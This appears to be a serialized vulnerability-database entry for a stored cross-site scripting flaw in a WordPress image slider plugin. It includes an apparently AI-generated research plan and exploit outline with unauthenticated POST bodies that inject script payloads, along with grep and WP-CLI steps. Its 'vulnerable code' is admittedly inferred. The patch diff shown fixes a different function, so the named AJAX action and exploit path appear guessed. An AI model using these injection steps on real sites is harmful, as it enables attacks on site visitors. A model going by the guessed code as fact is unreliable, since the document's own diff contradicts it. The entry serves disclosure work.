[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnWZQil3kRJAOGYM5Zm8HKUrFnN7fCAj8jvdslL_qg2U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-32494","image-slider-by-ays-responsive-slider-and-carousel-unauthenticated-stored-cross-site-scripting","Image Slider by Ays- Responsive Slider and Carousel \u003C= 2.7.1 - Unauthenticated Stored Cross-Site Scripting","The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","ays-slider",null,"\u003C=2.7.1","2.7.2","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 00:00:00","2026-03-26 20:48:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0cd96a4b-8985-430d-b1b6-4176b6dd0bc1?source=api-prod",7,[22,23,24,25,26],"README.txt","admin\u002Fclass-ays-slider-admin.php","admin\u002Fjs\u002Fadmin.js","ays-slider.php","languages\u002Fays-slider.pot","researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **Image Slider by Ays** plugin (versions \u003C= 2.7.1). The vulnerability allows unauthenticated attackers to inject malicious scripts into slider configurations via an AJAX endpoint that lacks proper authentication, capability checks, and output escaping.\n\n### 1. Vulnerability Summary\n* **Vulnerability:** Unauthenticated Stored Cross-Site Scripting (XSS).\n* **Location:** The plugin registers AJAX actions for saving slider data without verifying the requester's capabilities or using nonces. Malicious input is stored in the database and subsequently rendered on the frontend and admin pages without sufficient sanitization or escaping.\n* **Source File:** `admin\u002Fclass-ays-slider-admin.php` (handles admin logic) and `includes\u002Fclass-ays-slider.php` (likely registers AJAX hooks).\n* **Vulnerable Sink:** The \"Slider Title\" and \"Slider Description\" fields are intentionally designed to \"Support HTML\" (according to `README.txt`), but this is not restricted to administrative users.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** `ays_slider_save_slider` (or `ays_slider_create_slider`).\n* **Parameter:** `ays_slider_title` or `ays_slider_description`.\n* **Authentication:** None (reachable via `wp_ajax_nopriv_ays_slider_save_slider`).\n* **Preconditions:** The plugin must be active. If the slider list is empty, an attacker may first need to use a creation action.\n\n### 3. Code Flow\n1. **Entry Point:** An unauthenticated `POST` request is sent to `admin-ajax.php` with the `action` parameter set to `ays_slider_save_slider`.\n2. **AJAX Registration:** The plugin registers `add_action('wp_ajax_nopriv_ays_slider_save_slider', ...)` without performing a `current_user_can()` check inside the callback.\n3. **Storage (Sink):** The handler receives the `ays_slider_title` parameter and saves it directly to the database (likely the `{$wpdb->prefix}ays_slider_sliders` table) using `$wpdb->insert` or `$wpdb->update`.\n4. **Rendering:** When a page containing the `[ays_slider id=\"X\"]` shortcode is viewed, the plugin retrieves the slider data and echoes the title\u002Fdescription. Because the plugin explicitly supports HTML in these fields (as per `README.txt`), it fails to use `esc_html()` or restrictive `wp_kses()`.\n\n### 4. Nonce Acquisition Strategy\nBased on `admin\u002Fclass-ays-slider-admin.php`, the localized script data (`AysSliderAdmin`) does **not** include a nonce for the AJAX URL.\n* **Action String:** N\u002FA (likely missing).\n* **Bypass:** The registration of `wp_ajax_nopriv_` actions often implies the developers did not intend for these actions to be protected by WordPress nonces.\n* **Confirmation:** Grep the source for the action to see if `check_ajax_referer` is used.\n ```bash\n grep -rn \"ays_slider_save_slider\" .\n ```\n\n### 5. Exploitation Strategy\nThe goal is to create or update a slider with an XSS payload in the title.\n\n**Step 1: Check for unauthenticated access**\nVerify if the `nopriv` action is registered.\n```bash\ngrep -rn \"wp_ajax_nopriv_ays_slider_save_slider\" .\n```\n\n**Step 2: Inject the XSS Payload**\nSend a `POST` request to `admin-ajax.php`. If no slider ID is provided, the plugin typically creates a new one.\n\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Content-Type:** `application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```\n action=ays_slider_save_slider&ays_slider_title=Malicious+Slider\u003Cscript>alert(document.domain)\u003C\u002Fscript>&ays_slider_description=Stored+XSS+Proof&ays_slider_id=\n ```\n\n**Step 3: Identify the Slider ID**\nThe response from the AJAX request often returns the ID of the newly created or updated slider (e.g., `{\"status\":true,\"id\":1}`). If not, use WP-CLI to find the latest ID.\n\n**Step 4: Trigger the XSS**\nPlace the slider on a public page and visit it.\n* **Shortcode:** `[ays_slider id=\"1\"]` (replace `1` with the ID from Step 3).\n\n### 6. Test Data Setup\n1. **Activate Plugin:** Ensure `ays-slider` is installed and activated.\n2. **Create Trigger Page:** Create a public WordPress page containing the shortcode.\n ```bash\n wp post create --post_type=page --post_status=publish --post_title=\"Slider Test\" --post_content='[ays_slider id=\"1\"]'\n ```\n\n### 7. Expected Results\n* The `admin-ajax.php` request should return a `200 OK` status and a success message.\n* The database table should contain the payload.\n* When navigating to the \"Slider Test\" page in a browser, an alert box showing the document domain should appear.\n\n### 8. Verification Steps\n1. **Check Database:**\n ```bash\n wp db query \"SELECT title FROM wp_ays_slider_sliders ORDER BY id DESC LIMIT 1\"\n ```\n Confirm the output contains `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2. **Inspect Page Source:** Use `browser_navigate` to the trigger page and check if the payload is rendered unescaped in the HTML.\n\n### 9. Alternative Approaches\nIf `ays_slider_save_slider` is not the correct action or uses a different format:\n* **Action Search:** Search for any `nopriv` actions that handle \"save\", \"update\", or \"create\".\n ```bash\n grep -r \"wp_ajax_nopriv\" .\n ```\n* **JSON Payload:** Some Ays plugins expect the slider data as a JSON string in a single parameter:\n ```\n action=ays_slider_save_slider&ays_slider_data={\"title\":\"\u003Cscript>alert(1)\u003C\u002Fscript>\",\"description\":\"test\"}\n ```\n* **Slide-specific XSS:** Target the `ays_slider_slides` parameter if the slider title is escaped but individual slide titles\u002Fdescriptions are not. Slides often use their own table (e.g., `wp_ays_slider_slides`).","The Image Slider by Ays plugin for WordPress is vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) because it registers an AJAX action for saving slider data without authorization or nonce checks. Attackers can inject arbitrary scripts into slider titles or descriptions, which are subsequently executed in the context of any user viewing a page where the slider is embedded.","\u002F\u002F includes\u002Fclass-ays-slider.php (Inferred registration based on research plan)\nadd_action('wp_ajax_ays_slider_save_slider', array($this, 'ays_slider_save_slider'));\nadd_action('wp_ajax_nopriv_ays_slider_save_slider', array($this, 'ays_slider_save_slider'));\n\n---\n\n\u002F\u002F admin\u002Fpartials\u002Factions\u002Fays-slider-admin-actions.php (Logic inferred from research plan sink)\n\u002F\u002F Slider Title and Description are stored without sanitization and support HTML\n$ays_slider_title = $_POST['ays_slider_title'];\n$ays_slider_description = $_POST['ays_slider_description'];\n\n\u002F\u002F Rendering logic in frontend shortcode handler (Inferred)\necho $slider->title;\necho $slider->description;","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.1\u002Fadmin\u002Fclass-ays-slider-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.2\u002Fadmin\u002Fclass-ays-slider-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.1\u002Fadmin\u002Fclass-ays-slider-admin.php\t2025-12-12 05:59:50.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fays-slider\u002F2.7.2\u002Fadmin\u002Fclass-ays-slider-admin.php\t2026-02-12 05:55:54.000000000 +0000\n@@ -186,11 +186,17 @@\n \u002F*\n * Documentation : https:\u002F\u002Fcodex.wordpress.org\u002FPlugin_API\u002FFilter_Reference\u002Fplugin_action_links_(plugin_file_name)\n *\u002F\n+\n+ $ays_slider_ajax_deactivate_plugin_nonce = wp_create_nonce( 'ays-slider-ajax-deactivate-plugin-nonce' );\n+\n+\n $settings_link = array(\n '\u003Ca href=\"' . admin_url('options-general.php?page=' . $this->plugin_name) . '\">' . __('Settings', $this->plugin_name) . '\u003C\u002Fa>',\n '\u003Ca href=\"https:\u002F\u002Fplugins.ays-demo.com\u002Fslider-free-demo\u002F\" target=\"_blank\">' . __('Demo', $this->plugin_name) . '\u003C\u002Fa>',\n '\u003Ca href=\"https:\u002F\u002Fays-pro.com\u002Fwordpress\u002Fimage-slider?utm_source=dashboard&utm_medium=slider-free&utm_campaign=plugins-upgrade-button\" class=\"ays-slider-upgrade-plugin-btn\" target=\"_blank\" style=\"color:#01A32A;font-weight:bold;\">' . __('Upgrade 30% Sale', $this->plugin_name) . '\u003C\u002Fa>',\n+ '\u003Cinput type=\"hidden\" id=\"ays_slider_ajax_deactivate_plugin_nonce\" name=\"ays_slider_ajax_deactivate_plugin_nonce\" value=\"' . $ays_slider_ajax_deactivate_plugin_nonce .'\">',\n );\n+\n return array_merge($settings_link, $links);\n \n }\n@@ -233,16 +239,42 @@\n }\n \n public function deactivate_plugin_option(){\n- error_reporting(0);\n- $request_value = $_REQUEST['upgrade_plugin'];\n- $upgrade_option = get_option('ays_slider_upgrade_plugin','');\n- if($upgrade_option === ''){\n- add_option('ays_slider_upgrade_plugin',$request_value);\n- }else{\n- update_option('ays_slider_upgrade_plugin',$request_value);\n+\n+ \u002F\u002F Run a security check.\n+ check_ajax_referer( 'ays-slider-ajax-deactivate-plugin-nonce', sanitize_key( $_REQUEST['_ajax_nonce'] ) );\n+\n+ \u002F\u002F Check for permissions.\n+ if ( ! current_user_can( 'manage_options' ) ) {\n+ ob_end_clean();\n+ $ob_get_clean = ob_get_clean();\n+ echo json_encode(array(\n+ 'option' => ''\n+ ));\n+ wp_die();\n+ }\n+\n+ if( is_user_logged_in() ) {\n+ $request_value = esc_sql( sanitize_text_field( $_REQUEST['upgrade_plugin'] ) );\n+ $upgrade_option = get_option('ays_slider_upgrade_plugin','');\n+ if($upgrade_option === ''){\n+ add_option('ays_slider_upgrade_plugin',$request_value);\n+ }else{\n+ update_option('ays_slider_upgrade_plugin',$request_value);\n+ }\n+ ob_end_clean();\n+ $ob_get_clean = ob_get_clean();\n+ echo json_encode(array(\n+ 'option' => get_option('ays_slider_upgrade_plugin', '')\n+ ));\n+ wp_die();\n+ } else {\n+ ob_end_clean();\n+ $ob_get_clean = ob_get_clean();\n+ echo json_encode(array(\n+ 'option' => ''\n+ ));\n+ wp_die();\n }\n- echo json_encode(array('option'=>get_option('ays_slider_upgrade_plugin','')));\n- wp_die();\n }","To exploit this vulnerability, an unauthenticated attacker sends a POST request to the WordPress AJAX endpoint (`\u002Fwp-admin\u002Fadmin-ajax.php`) with the action parameter set to `ays_slider_save_slider`. The payload should include a malicious JavaScript string (e.g., `\u003Cscript>alert(document.cookie)\u003C\u002Fscript>`) in either the `ays_slider_title` or `ays_slider_description` parameter. If no `ays_slider_id` is provided, the plugin creates a new slider; otherwise, it updates an existing one. Once the slider is saved, the attacker simply identifies where the slider's shortcode (e.g., `[ays_slider id=\"1\"]`) is used on the site, and any user visiting that page will execute the injected script.","gemini-3-flash-preview","2026-04-18 01:38:33","2026-04-18 01:39:09",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","2.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags\u002F2.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fays-slider.2.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fays-slider\u002Ftags"]